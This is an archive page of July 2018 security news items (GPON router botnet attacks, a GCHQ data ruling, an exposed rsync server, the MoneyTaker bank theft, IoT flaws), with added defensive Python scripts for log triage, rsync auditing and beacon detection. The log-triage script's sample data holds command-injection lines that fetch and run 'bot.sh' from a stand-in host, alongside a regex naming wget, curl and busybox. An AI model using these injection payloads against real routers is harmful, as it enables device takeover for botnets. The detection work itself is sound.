Archive for July 2018

Attackers Go After GPON Routers, Again

Using automated analysis via a Python script, researchers at eSentire observed an increase in exploitation attempts on gigabit passive optical network (GPON) routers. Though the router attacks had declined since the surge reported back in June, the researchers identified a new, coordinated weaponization campaign targeting D-Link routers on 20 July.

The company reported a botnet recruitment campaign being launched and saw a surge of exploit attempts from over 3,000 different source IPs, introducing a variation of the OS command injection attack against the 2750B D-Link router.

“A sample of packets from various source IPs involved in this event pointed to a single C2 server hosting malware that appeared. VirusTotal results for the malware indicated similarities with the Mirai botnet. Variants of Mirai code have been spotted in the Satori botnet,” researchers wrote.

While none of these exploits appeared to be successful in corporate environments, likely because they lack consumer-grade routers, “it is unknown whether this attack had any success on home networks where these devices are more likely to be deployed. A successful recruitment campaign has the potential to arm the associated threat actor(s) with DDoS artillery and facilitate espionage of private browsing habits,” researchers wrote in a blog post.  

The sheer number of attacks is indicative of a botnet, and the researchers suggested that botnets built from compromised routers could be offered as a service, adding: “It is not uncommon for botnet controllers to attempt to increase the number of devices in their botnet by using tactics similar to this. The infected devices can then be used to launch additional attacks such as distributing malicious content or launching DDoS attacks.”

In addition, the company also released an advisory on the topic and noted that only Dasan routers using ZIND-GPON-25xx firmware and some H650 series GPON are vulnerable, and that there are no official patches at this time. Researchers are continuing to monitor the associated signatures.
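The campaign above was spotted as a jump in the number of distinct source IPs sending command-injection requests. The script below is an added example of that kind of automated log triage; it is not eSentire's Python script and does not reproduce the campaign's actual payload. The log format, the `/cgi-bin/router.cgi?cmd=` request path and every IP address are constructed for illustration, and the injection markers are generic shell metacharacters rather than a signature for any particular router.

```python
"""Surge detection for OS-command-injection attempts in web/honeypot logs.

Added example, not eSentire's script or code from the article. The log
format, the request path and the IP addresses are constructed; the
injection markers are generic shell metacharacters, not a vendor-specific
signature.
"""
import re
import statistics
from collections import defaultdict
from urllib.parse import unquote

# Generic markers of shell command injection inside a URL parameter value.
INJECTION_MARKERS = re.compile(
    r"(;|\|\||&&|\$\(|`|\bwget\b|\bcurl\b|\bbusybox\b|/bin/sh|/tmp/)",
    re.IGNORECASE,
)

# Constructed log lines: "<date> <src_ip> <METHOD> <path?query>" (hypothetical format).
SAMPLE_LOG = """\
2018-07-18 203.0.113.10 GET /index.html
2018-07-18 203.0.113.11 GET /cgi-bin/router.cgi?cmd=ping%20-c%201%20127.0.0.1
2018-07-18 203.0.113.12 POST /cgi-bin/router.cgi?cmd=ping;wget%20http://198.51.100.9/bot.sh%20-O%20/tmp/bot.sh
2018-07-19 203.0.113.13 GET /status
2018-07-20 198.51.100.1 POST /cgi-bin/router.cgi?cmd=`/bin/sh%20/tmp/bot.sh`
2018-07-20 198.51.100.2 POST /cgi-bin/router.cgi?cmd=x||busybox%20wget%20http://198.51.100.9/bot.sh
2018-07-20 198.51.100.3 POST /cgi-bin/router.cgi?cmd=x$(wget%20http://198.51.100.9/bot.sh)
2018-07-20 198.51.100.4 POST /cgi-bin/router.cgi?cmd=x&&curl%20http://198.51.100.9/bot.sh
2018-07-20 198.51.100.5 POST /cgi-bin/router.cgi?cmd=ping;sh%20/tmp/bot.sh
2018-07-20 198.51.100.6 GET /login
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def is_injection_attempt(request: str) -> bool:
    """True if the (URL-decoded) query string carries shell metacharacters.

    Decoding first matters: attackers percent-encode ';', '|' and spaces,
    so matching the raw request line would miss most attempts.
    """
    if "?" not in request:
        return False
    query = unquote(request.split("?", 1)[1])
    return INJECTION_MARKERS.search(query) is not None


def sources_per_day(log_text: str) -> dict:
    """Map each day to the sorted list of source IPs that sent an injection attempt."""
    days = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        day, src, _method, request = m.groups()
        if is_injection_attempt(request):
            days[day].add(src)
    return {day: sorted(ips) for day, ips in days.items()}


def find_surge_days(log_text: str, factor: float = 3.0, min_sources: int = 3) -> list:
    """Days whose count of distinct attacking sources is more than `factor`
    times the median of the other days and at least `min_sources`.

    Counting distinct sources rather than raw requests is what separates a
    coordinated recruitment campaign from one noisy scanner.
    """
    per_day = {day: len(ips) for day, ips in sources_per_day(log_text).items()}
    surges = []
    for day, count in per_day.items():
        others = [v for d, v in per_day.items() if d != day] or [0]
        baseline = statistics.median(others)
        if count >= min_sources and count > factor * baseline:
            surges.append(day)
    return sorted(surges)


if __name__ == "__main__":
    for day, ips in sorted(sources_per_day(SAMPLE_LOG).items()):
        print(day, len(ips), "distinct sources")
    print("surge days:", find_surge_days(SAMPLE_LOG))
```

On the constructed sample, 18 July shows one injecting source and 20 July five, so only 20 July is reported. On real data the baseline should be a rolling window of days rather than "all other days", and the source list is what you would hand to the C2 analysis the researchers describe.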

Source: Information Security Magazine

Foreign Secretaries Illegally Handed GCHQ Data Request Powers

A new Investigatory Powers Tribunal (IPT) ruling has exposed the inadequacy of current oversight mechanisms meant to keep the surveillance state in check, and the willingness of telecoms firms to hand over customers’ data to GCHQ, according to a leading rights group.

Privacy International (PI) claimed victory today after a tenacious legal investigation which had forced GCHQ to make “substantial corrections” to evidence it originally gave to the court mid-case.

Its job was made harder by the fact that the IPT relies heavily on closed hearings where claimants like PI can’t see or challenge evidence presented by the government, and only progressed after the “extraordinary” decision was taken to allow the group to cross-examine a GCHQ witness.

The IPT’s decision held that successive foreign secretaries unlawfully delegated to GCHQ decisions about what data to acquire from telecommunication companies — effectively rendering 10 years’ worth of secretly collected data illegal.

"In theory the agency [GCHQ] could have used the general form of such directions to impose on the CSP a requirement to produce communications data which extended beyond the scope of any data requirement which had been sanctioned by the Foreign Secretary,” the IPT apparently ruled.

The judgement also casts an unforgiving light on the telcos themselves, which appeared to have handed over highly sensitive data on their customers without question in response to verbal requests.

“The foreign secretary was supposed to protect access to our data by personally authorizing what is necessary and proportionate for telecommunications companies to provide to the agencies. The way that these directions were drafted risked nullifying that safeguard, by delegating that power to GCHQ — a violation that went undetected by the system of commissioners for years and was seemingly consented to by all of the telecommunications companies affected,” argued PI solicitor Millie Graham Wood.

“It is proof positive of the inadequacy of the historic oversight system; the complicity of telecommunications companies who instead of checking if requests were lawful, just handed over customers' personal data as long as their cooperation was kept secret; and the scale of the task facing the new investigatory powers commissioner, Sir Adrian Fulford.”

Source: Information Security Magazine

Supplier Error Leaks Decade of Data from Carmakers

A security error by a third-party supplier has left over 100 manufacturing firms including several big-name carmakers red-faced after sensitive documents were exposed.

Over 150GB of data was left on a publicly accessible server by Level One Robotics, a supplier to Tier 1 automotive firms including VW, Chrysler, Ford, Toyota, GM and Tesla, and German manufacturing giant ThyssenKrupp.

The culprit was an rsync server exposed to the internet with no IP or user restrictions, so any rsync client that connected to the rsync port could download the data, according to Upguard.

“The 157GBs of exposed data include over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements, detailing the sensitivity of the exposed information,” the security vendor explained.

“Not all types of information were discovered for all customers, but each customer contained some data of these kinds. Also included are personal details of some Level One employees, including scans of driver’s licenses and passports, and Level One business data, including invoices, contracts, and bank account details.”

Even worse, the rsync server was publicly writable at the time the privacy snafu was discovered, meaning a malicious outsider could have altered the documents stored there or even uploaded malware.

Level One was praised for reacting quickly to the incident once notified by Upguard. However, organizations were urged to do more to secure their supply chains.

“Organizations and their vendors must have standardized deployment processes that create and maintain assets securely, reducing the likelihood of a data incident,” said Upguard.

“If this security is not built into the processes themselves, there will always be misconfigurations that slip through and lead to data exposure. They must also have an exposure response plan, so that when they are affected, they can act quickly to remediate, as Level One did in this case.”
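The exposure above comes down to three rsyncd settings: no `hosts allow`, no `auth users`, and `read only = no`. The script below is an added example of the kind of automated check Upguard is calling for; it is not Upguard's tooling and has nothing to do with Level One's actual configuration. Both rsyncd.conf fragments are constructed, including the module name and path. It relies on rsyncd.conf being ini-like, with global settings before the first `[module]` header and inherited by every module.

```python
"""Audit rsyncd.conf for an anonymous, unrestricted or writable module.

Added example, not Upguard's tooling. Both configs below are constructed:
the module name and path are made up. Defaults follow rsyncd.conf(5):
'read only' and 'list' default to yes, 'hosts allow' and 'auth users'
default to unrestricted/anonymous.
"""
import configparser

# Constructed: the anonymous, world-writable layout described in the article.
EXPOSED_CONF = """\
uid = nobody
gid = nogroup
use chroot = yes

[customer_docs]
path = /srv/customer_docs
read only = no
list = yes
"""

# Constructed: the same module with the controls the exposed one lacked.
HARDENED_CONF = """\
uid = nobody
gid = nogroup
use chroot = yes
hosts allow = 10.20.0.0/16
hosts deny = *

[customer_docs]
path = /srv/customer_docs
read only = yes
list = no
auth users = customer_sync
secrets file = /etc/rsyncd.secrets
"""


def parse_rsyncd_conf(text: str) -> dict:
    """Return {module: {setting: value}} with global settings applied as defaults.

    rsyncd.conf has no header for the global section, so one is prepended
    and registered as configparser's default section, which makes every
    module inherit it exactly as rsync does.
    """
    cp = configparser.ConfigParser(default_section="global", interpolation=None)
    cp.read_string("[global]\n" + text)
    return {name: dict(cp[name]) for name in cp.sections()}


def _is_yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")


def audit_module(settings: dict) -> list:
    """Return findings for one module; an empty list means nothing to report."""
    findings = []
    if not settings.get("hosts allow", "").strip():
        findings.append("no 'hosts allow': any IP may connect")
    if not settings.get("auth users", "").strip():
        findings.append("no 'auth users': anonymous access")
    if not _is_yes(settings.get("read only", "yes")):
        findings.append("'read only = no': clients can modify or upload files")
    if _is_yes(settings.get("list", "yes")):
        findings.append("'list = yes': module is discoverable by listing the daemon")
    return findings


def audit_rsyncd_conf(text: str) -> dict:
    """Audit every module in an rsyncd.conf; returns {module: [findings]}."""
    return {name: audit_module(s) for name, s in parse_rsyncd_conf(text).items()}


if __name__ == "__main__":
    for label, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        for module, findings in audit_rsyncd_conf(conf).items():
            print(f"{label}/{module}: {findings or 'OK'}")
```

Run it in CI against the deployed configuration, not a copy in a repo, since the page's point is that misconfigurations slip through when the check is not part of the deployment process itself. A module that is `read only = no` is the writable case the article calls "even worse"; it is also the one a port scan alone will not tell you about.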

Source: Information Security Magazine

Has GDPR Impacted Insider Threats?

According to new research from Clearswift, the introduction of GDPR has led to a slight drop in insider threats in both the UK and Germany. Survey respondents said that insider threats make up 65% of reported incidents in 2018, compared to 73% last year. German companies reported similar declines, with insider error incidents at 75% this year, down from 80% last year.

The research surveyed 400 senior IT decision makers from global organizations with more than 1,000 employees and found that 38% of IT security incidents occur as a direct result of their employees’ actions, with 75% of all incidents originating from their extended enterprise, which includes employees, customers and suppliers. Former employees represent 13% of cybersecurity incidents for the participating organizations.

According to this year’s survey, despite the reality that internal threats are the greatest risk to most organizations, employees believe that the majority of incidents (62%) are accidental, which is only a slight decrease from 65% in 2017.

“Although there’s a slight decrease in numbers in the EMEA region, the results once again highlight the insider threat as being the chief source of cybersecurity incidents,” Dr. Guy Bunker, SVP of products at Clearswift, said in a press release. “Three-quarters of incidents are still coming from within the business and its extended enterprise, far greater than the threat from external hackers. Businesses need to shift the focus inwards."

“Organizations need to have a process for tracking the flow of information in the business and have a clear view on who is accessing it and when," Bunker continued. "Businesses need to also ensure that employees ‘buy into’ the idea that data security is now a critical issue for the business. Educating them on the value of data, on different forms of data, what is shareable and what's not, is crucial to a successful cybersecurity strategy."

Given that the percentage changes are so slight, Ben Herzberg, director of threat research at Imperva, said that the minimal decline reinforces the notion that companies should not assume that their internal network is safe from threats.

“I’m not sure if GDPR is the cause of the change in the statistics gathered, but with or without GDPR, it’s important for organizations to know exactly where they store their data, and be accountable for it.”

Source: Information Security Magazine

Who Are ComplyRight's Security Employees?

The website of human resources firm ComplyRight was reportedly breached and sensitive data compromised, according to KrebsonSecurity. In addition to tax forms from thousands of the company’s clients, other sensitive information accessed in the breach included names, addresses, phone numbers, email addresses and Social Security numbers.

As part of his investigation, Krebs reported that he searched ComplyRight employee profiles on LinkedIn in an effort to reach members of the security department, yet he was unable to find anyone whose job title was related to security. He also noted that the company had no current listing for security job openings.

“The fact that the company touts its security prowess, yet Brian Krebs couldn’t identify a single employee with a security title, is deeply concerning – and just another reason for consumers to question their trust in digital businesses,” said Jeannie Warner, security manager at WhiteHat Security.

“Every single company that touches sensitive data needs to make security a consistent, top-of-mind concern. And any company offering software as a service should have an obligation to perform the strictest security tests against vulnerable avenues into client networks: APIs, network connections, mobile apps, websites, databases," Warner said. "Interestingly, in a check on its website, it is still not advertising anyone in IT security, nor is security mentioned in the requirements for digital product hires.”

According to WhiteHat Security research, a number of web applications remain "always vulnerable" and susceptible to attack on a daily basis. “Despite the fact that web applications often house sensitive consumer data, they are often forgotten when it comes to implementing security measures – making them an easy target for hackers, who can exploit them and gain access to back-end corporate databases,” she said.

As a human resources firm, ComplyRight handles forms overflowing with personally identifiable information, such as 1099s and W-2s. While the size of the hack isn’t known yet, the company disclosed that it first learned of the incident in late May 2018, at which point it disabled the platform and remediated the issue on the website.

“In consultation with third-party forensic cybersecurity experts, we took swift action to secure the data of our partners, business customers and the individuals potentially impacted,” ComplyRight wrote in its incident notice. The company also reported that it initiated a thorough communication plan to alert those individuals potentially affected by the breach, which the company said is less than 10% of those who have prepared tax forms on the web platform.

Source: Information Security Magazine

Rosenstein Warns Russia Is Only One Tree in Forest

In the closing session of the first full day of the 2018 Aspen Security Forum, Deputy Attorney General Rod Rosenstein warned not only of increased threats from Russian influence operations but also of the additional global cyber-threats from other nation-states.

Sharing key points from the Justice Department’s new cyber-digital task force report, Rosenstein said that Russian interference in the 2016 presidential election was “just one tree in a growing forest,” according to The Hill.

Affirming that Russia is not the only foreign adversary targeting the US with cyber-threats, Rosenstein’s comments come only days after The New York Times reported that a "besieged Trump" appeared to be ad-libbing when he said that foreign meddling “could be other people also…a lot of people out there.”

During his presentation, Confronting Global Cyber Threats, which followed earlier sessions Defending Democratic Institutions: Election 2018 and Beyond and Securing the Homeland, Rosenstein reportedly warned, “These actions are persistent, they’re pervasive, they are meant to undermine democracy on a daily basis – regardless of whether it is election time or not.”

Combating the advanced, persistent threats from different nation-state actors, including North Korea, China and Iran, is at the root of the report Rosenstein referenced in yesterday’s talk.

“Computer intrusions, cybercrime schemes and the covert misuse of digital infrastructure have bankrupted firms, destroyed billions of dollars in investments and helped hostile foreign governments launch influence operations designed to undermine fundamental American institutions,” the report said.

Technology’s rapid advancement has empowered malicious foreign actors to reach “unprecedented numbers of Americans covertly and without setting foot on U.S. soil. Fabricated news stories and sensational headlines like those sometimes found on social media platforms are just the latest iteration of a practice foreign adversaries have long employed in an effort to discredit and undermine individuals and organizations in the United States,” according to the report.

Rosenstein’s remarks were part of a panel moderated by David Sanger, chief Washington correspondent at The New York Times. Panel members included Thomas Bossert, former assistant to the president for Homeland Security and Counterterrorism; Greg Clark, Symantec’s CEO; and Lisa Monaco, former assistant to the president for Homeland Security and Counterterrorism.

Source: Information Security Magazine

MoneyTaker Grabs $1m from PIR Bank

The hacker group MoneyTaker stole $1m from Russian bank PIR, transferring the money to 17 accounts at other major Russian banks before cashing out. Group-IB was hired to respond to the incident and limit the damage; because the stolen funds were withdrawn, most of the money is thought to be lost to PIR Bank.

Group-IB confirmed that the attack on PIR Bank started in late May 2018, with the hackers gaining access to the bank by compromising a router used by one of the bank's regional branches. In a press release, the company said: "The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response, this was detected by Group-IB employees and removed by the bank’s sysadmins.” 

Back in 2017, Group-IB confirmed that 20 companies across the globe had already fallen victim to the hacking group. Conducting successful attacks on financial institutions and legal firms in the USA, UK and Russia, the group had primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and SWIFT (US).

The first attack by MoneyTaker was recorded in spring 2016, when they stole money from a US bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers did not conduct attacks for almost four months and only attacked banks in Russia in September 2016. In these instances, its target was AWS CBR, the Russian interbank transfer system. In general, in 2016, Group-IB recorded 10 MoneyTaker attacks against organisations in the U.S., UK and Russia. Since 2017, the geography of their attacks has shrunk to Russia and the US. In 2018, Group-IB tracked two MoneyTaker attacks in Russia.

According to a blog on the company's website, MoneyTaker constantly changes its tools and tactics to bypass anti-virus and traditional security solutions. Most importantly, they carefully eliminate their traces after completing their operations, resulting in the group going largely unnoticed. The group has been active since around spring 2016 when they stole money from a US bank after gaining access to the card processing system. 
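The reverse shells Group-IB describes are implants that connect out from the bank's network to the attackers' servers and wait for commands. One thing an incident responder can hunt for without any malware signature is the regular outbound connection pattern such an implant produces. The script below is an added example of that beaconing check, not Group-IB's tooling and not a description of MoneyTaker's actual implant. The connection records are constructed: one internal host polling an external address every five minutes with slight jitter, mixed with ordinary browsing from the same host, and the IP addresses are made up.

```python
"""Beacon detection over outbound connection records (proxy, netflow, firewall).

Added example, not Group-IB's tooling. All records are constructed: an
implant polling its server every 300 s with a few seconds of jitter,
ordinary browsing with irregular gaps, and a one-off connection from a
second host. IP addresses are made up.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def _constructed_connections() -> list:
    """Constructed sample: (iso_timestamp, src_ip, dst_ip, dst_port) records."""
    base = datetime(2018, 5, 28, 9, 0, 0)
    recs = []
    # A polling implant: one connection every 300 s, a few seconds of jitter.
    for i, jitter in enumerate([0, 2, -1, 3, 0, -2, 1, 0]):
        t = base + timedelta(seconds=300 * i + jitter)
        recs.append((t.isoformat(), "10.1.5.23", "198.51.100.77", 443))
    # Ordinary browsing from the same host: irregular gaps.
    for offset in [15, 40, 330, 600, 1400, 1450, 2300, 2900]:
        t = base + timedelta(seconds=offset)
        recs.append((t.isoformat(), "10.1.5.23", "93.184.216.34", 443))
    # A single connection from another host: too few samples to judge.
    recs.append(((base + timedelta(seconds=1000)).isoformat(), "10.1.5.40", "198.51.100.77", 443))
    return recs


SAMPLE_CONNECTIONS = _constructed_connections()


def beacon_candidates(connections: list, min_connections: int = 6, max_cv: float = 0.2) -> list:
    """Return [(src, dst, port, mean_gap_s, cv)] for (src, dst, port) pairs whose
    inter-connection gaps are regular.

    Regularity is measured as the coefficient of variation (stdev / mean) of
    the gaps between consecutive connections: a polling implant with light
    jitter scores near 0, human browsing scores well above max_cv.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port in connections:
        by_pair[(src, dst, port)].append(datetime.fromisoformat(ts))

    hits = []
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue  # not enough samples to call the interval regular
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            hits.append((*pair, round(mean, 1), round(cv, 3)))
    return hits


if __name__ == "__main__":
    for src, dst, port, mean_gap, cv in beacon_candidates(SAMPLE_CONNECTIONS):
        print(f"{src} -> {dst}:{port} every ~{mean_gap}s (cv={cv})")
```

On the sample only the 10.1.5.23 to 198.51.100.77 pair is reported, with a mean gap of 300 seconds. Legitimate software polls on a schedule too (update checks, telemetry, NTP), so in practice the output is filtered against an allow-list of known destinations; what remains is the shortlist the responders then pull process and host data on.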

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible," said Olga Kolosova, Chairperson of the Management Board, PIR Bank LLC. "At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents.”

Source: Information Security Magazine

UK Puts Huawei on the Naughty Step for Security Issues

A report by the Huawei Cyber Security Evaluation Centre (HCSEC) Oversight Board has found that the company's products, which are deployed or are contracted to be deployed in the UK, have underlying engineering issues.

Addressed to the UK National Security Advisor, the HCSEC Oversight Board's fourth annual report explained that there were still concerns regarding the company's broadband and mobile infrastructure products, referring to security-critical third-party software used in a variety of products which was "not subject to sufficient control."

"There have been a number of detailed technical discussions between Huawei R&D and HCSEC, some including the National Cyber Security Centre," said the report. "These discussions are working towards a full understanding of the problem, a short-term mitigation plan and a more strategic fix for the underlying cause of the problem.

"However, there is a significant risk in the UK telecoms infrastructure if Huawei and the operators are unable to support these boards long-term."

According to the BBC, the HCSEC was set up in 2010 in response to concerns that BT and others' use of Huawei's equipment could pose a threat. The body is overseen by UK security officials, including GCHQ.

The previous three reports had concluded that any risks posed to the UK's national security "had been mitigated." In this latest report, however, the HCSEC identified two areas of concern: the consistent (reproducible) building of binary code, so that the binaries deployed can be shown to correspond to the source code evaluated, and insufficient management of third-party software.

In other countries such as the US, Chinese companies such as Huawei and ZTE have been banned, most recently from retail stores on US military bases. In Australia, there is also talk of Huawei being banned from its new 5G network due to security concerns.

In April 2018, the Wall Street Journal reported that the company was under US criminal investigation for illegal Iran sales, violating export sanctions.

In a statement, Huawei said: "The oversight board has identified some areas for improvement in our engineering processes. We are grateful for this feedback and committed to addressing these issues.”

Source: Information Security Magazine

Vulnerable IoT Vacuums, DVRs Put Homes at Risk

The internet of things (IoT) has seen a string of vulnerabilities across multiple devices, the latest of which are new vulnerabilities in Dongguan Diqee 360 robotic vacuum cleaners, which could allow cybercriminals to eavesdrop, perform video surveillance and steal private data, according to Positive Technologies.

Researchers Leonid Krolle and Georgy Zaytsev uncovered the Dongguan Diqee 360 security issues found on vacuums, which most likely affect not only those made by the company but those sold under other brand names as well. The devices affected by vulnerability CVE-2018-10987 are at risk of an authenticated remote code execution, potentially allowing an attacker to send a User Datagram Protocol (UDP) packet enabling them to execute commands on the vacuum cleaner as root.

A second vulnerability, CVE-2018-10988, involves a microSD card that reportedly could be used to exploit weaknesses in the vacuum's update mechanism. The researchers said that these vulnerabilities may also affect other IoT devices using the same video modules as Dongguan Diqee 360 vacuum cleaners. Such devices include outdoor surveillance cameras, DVRs, and smart doorbells.

That an authenticated attacker can gain access to the device in itself isn’t a major issue. “The difference is that this vacuum cleaner does not simply wander around the house, cleaning,” said Yotam Gutman, VP of marketing, SecuriThings. “It also serves as a mobile surveillance bot, with both day and night capabilities. Imagine that someone can get access to the device and watch the video feed, without the owners even realizing it. Even worse – someone can program the route of the device to drive around the house, filming the inside, which is very similar to what reconnaissance drones do in 'Star Wars' or other sci-fi movies."

"This is another incident/vulnerability that demonstrates just how hackable cheap connected devices are. Buyers of vacuum robots should really think if they want their nice little R2-D2-like helper to have reconnaissance capabilities.”

In related news, another vulnerability (CVE-2013-6117) has resurfaced despite being nearly five years old. Login passwords for tens of thousands of Dahua DVR devices were reportedly cached and indexed inside search results returned by IoT search engine ZoomEye.

Commenting on Twitter about the vulnerability, Ankit Anubhav, principal researcher at NewSky Security, wrote, “The attackers do not even need to write code to connect to the port as they can log in to a public scanner like ZoomEye, which stores the output of requests on its website, and dump it.

“A new low has been achieved in the ease of hacking IoT devices. One does not even need to connect to the Dahua devices to get the credentials.”

Source: Information Security Magazine

Attention Airline Passengers, Your Data Is at Risk

A new report, Attention All Passengers: Airport Networks Are Putting Your Devices & Cloud Apps at Severe Risk, released by Coronet found that some of America’s airports are cyber-insecure.

The data collected identified San Diego International Airport, John Wayne Airport-Orange County (CA) International Airport and Houston’s William P. Hobby International Airport as lagging in cybersecurity.

Over the course of five months, vast amounts of data on device vulnerabilities and Wi-Fi network risks were collected from more than 250,000 consumer and corporate endpoints that traveled through America’s 45 busiest airports.

After extensive analysis, the data was compiled into an Airport Threat Score, which identified not only the most cyber-insecure airports but also the least vulnerable. Chicago-Midway International, Raleigh-Durham International and Nashville International ranked top of the list for low vulnerability.

According to the report, business travelers are at heightened risk of unintentionally facilitating unauthorized device access, data theft and malware/ransomware spread across their endpoints. Once devices are infected, the integrity and confidentiality of the employers’ essential cloud-based work apps, such as G Suite, Dropbox and Office 365, are jeopardized.

The data suggested that all flyers are at an elevated risk of connecting to unencrypted, unsecured or improperly configured networks, which can prompt identity theft, financial fraud, and personal files and picture theft.

“Far too many U.S. airports have sacrificed the security of their Wi-Fi networks for consumer convenience,” said Dror Liwer, Coronet’s founder and CISO.

“As a result, business travelers in particular put not just their devices, but their company’s entire digital infrastructure at risk every time they connect to Wi-Fi that is unencrypted, unsecured or improperly configured," said Liwer. "Until such time when airports take responsibility and improve their cybersecurity posture, the accountability is on each individual flyer to be aware of the risks and take the appropriate steps to minimize the danger.”

Source: Information Security Magazine